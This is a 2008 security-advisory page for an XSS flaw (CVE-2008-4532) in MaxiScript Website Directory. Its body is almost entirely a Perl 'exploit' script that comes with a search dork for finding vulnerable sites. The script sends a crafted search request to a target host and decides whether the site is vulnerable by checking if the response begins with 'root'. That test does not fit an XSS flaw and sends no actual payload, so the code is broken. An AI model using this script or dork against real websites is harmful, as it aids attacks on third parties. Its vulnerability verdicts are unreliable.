SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

Website Directory - XSS Exploit


Arrow  SecurityAlert : 4393
Arrow  CVE : CVE-2008-4532
Arrow  CWE : CWE-79
Arrow  SecurityRisk : Low  Security Risk Low  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Victim interaction required : Yes
Arrow  Exploit Available : Yes
Arrow  Credit : Ghost hacker
Arrow  Published : 10.10.2008

Arrow  Affected Software : maxiscript:website_directory



Arrow  Advisory Content :  


#!/usr/bin/perl

##################################

# Coded And Found by Ghost Hacker #

# Home www.Real-h.com
#

# Email Ghost-r00t[at]hotmail[dot]com #

##################################

use LWP::UserAgent;

use HTTP::Request;

use LWP::Simple;

print "\t\t########################################################\n\n";

print "\t\t# Website Directory - XSS Exploit #\n\n";

print "\t\t# by Ghost Hacker [Real-h.com] #\n\n";

print "\t\t# Dork : Powered by MaxiScript.com #\n\n";

print "\t\t########################################################\n\n";

if (!$ARGV[0])

{

print " Author : Ghost Hacker\n";

print " Home : www.Real-h.com\n";

print " Email : Ghost-r00t[at]Hotmail[dot]com\n";

print " Download : http://www.maxiscript.com/websitedirectory.php\n";

print " Usage : perl Ghost.pl [Host]\n";

print " Example : perl Ghost.pl http://Real-h.com/path/\n";

}

else

{

$web=$ARGV[0];

chomp $web;

$iny="index.php?keyword=Xss_Hacking&action=search";

my $web1=$web.$iny;

print "$web1\n\n";

my $ua = LWP::UserAgent->new;

my $req=HTTP::Request->new(GET=>$web1);

$doc = $ua->request($req)->as_string;

if ($doc=~ /^root/moxis ){

print "Web is vuln\n";

}

else

{

print "Web is not vuln\n";

}

}



Arrow  References :

http://xforce.iss.net/xforce/xfdb/45657
http://www.securityfocus.com/bid/31562
http://www.securityfocus.com/archive/1/archive/1/496967/100/0/threaded
http://secunia.com/advisories/32176




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.